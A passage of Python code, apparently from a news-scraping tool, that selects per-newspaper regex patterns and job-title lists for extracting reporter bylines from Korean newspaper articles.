, "ㅣ에디터부문장", "|국제부", "ㅣ 저널리즘책무실장"
]
selfPattern = [
"([가-힣]{2,4})\\s?종교전문기자\\s?email",
"([가-힣]{2,4})\\s?선임기자\\s?email",
"([가-힣]{2,4})\\s?기자\\s?email",
"([가-힣]{2,4})\\s?\\(email",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "파이낸셜뉴스" in target:
boardPattern = ["논설실장", "골프전문기자", "생활경제부장", "정치부장", "정책사회부장",
"정보미디어부", "블록체인팀", "부국장", "논설위원", "국제부장"
]
selfPattern = [
"email\\s?([가-힣]{2,4})\\s?기자",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "충청투데이" in target:
# boardPattern = ["논설실장","골프전문기자","생활경제부장","정치부장","정책사회부장",
# "정보미디어부", "블록체인팀", "부국장","논설위원","국제부장"
# ]
# =조재광 기자 cjk9230@cctoday.co.kr
selfPattern = [
"\\[충청투데이\\s?([가-힣]{2,4})\\s?기자",
"\\[충청투데이\\s?([가-힣]{2,4})",
"([가-힣]{2,4})\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "충청일보" in target:
# boardPattern = ["논설실장","골프전문기자","생활경제부장","정치부장","정책사회부장",
# "정보미디어부", "블록체인팀", "부국장","논설위원","국제부장"
# ]
# =조재광 기자 cjk9230@cctoday.co.kr
selfPattern = [
"\\[충청투데이\\s?([가-힣]{2,4})\\s?기자",
"\\[충청투데이\\s?([가-힣]{2,4})",
"([가-힣]{2,4})\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
# 충청일보
elif "충북일보" in target:
selfPattern = [
"\\/\\s?([가-힣]{2,4})\\s?기자",
"사진=([가-힣]{2,4})",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "중앙일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"제작=([가-힣]{2,4})",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "중부일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
# 중앙일보
elif "중부매일" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "중도일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부"
]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "조선일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "제민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "전자신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "전북일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "전북도민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자"]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "전남일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자"]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "울산매일" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자"]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "영남일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자"]
selfPattern = [
"=([가-힣]{2,4})기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "아주경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "팀장", "편집국장"]
selfPattern = [
"=([가-힣]{2,4})기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "아시아경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "팀장", "편집국장"]
selfPattern = [
"=([가-힣]{2,4})\\s기자",
"([가-힣]{2,4})\\s?기자\\s?email"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "세계일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "서울신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "서울경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "부산일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "문화일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "무등일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "머니투데이" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
"\\[머니투데이\\s?([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "매일신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
# 수정 필요 매일경제!!!!
elif "매일경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "감정평가사"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
"\\[스타투데이\\s?([가-힣]{2,4})\\s?기자",
"\\[([가-힣]{2,4})\\s?매일경제",
# 이종혁 매일경제
# 스타투데이 양소영 기자
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "디지털타임스" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "동아일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?동아닷컴\\s?기자\\s?email",
"동아닷컴\\s?([가-힣]{2,4})\\s?\\s?기자\\s?email",
"동아닷컴\\s?([가-힣]{2,4})\\s?\\s?기자\\s?email",
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "대전일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "대구일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "내일신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "국제신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "국민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "광주일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "광주매일신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경향신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경인일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경상일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경남신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경남도민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
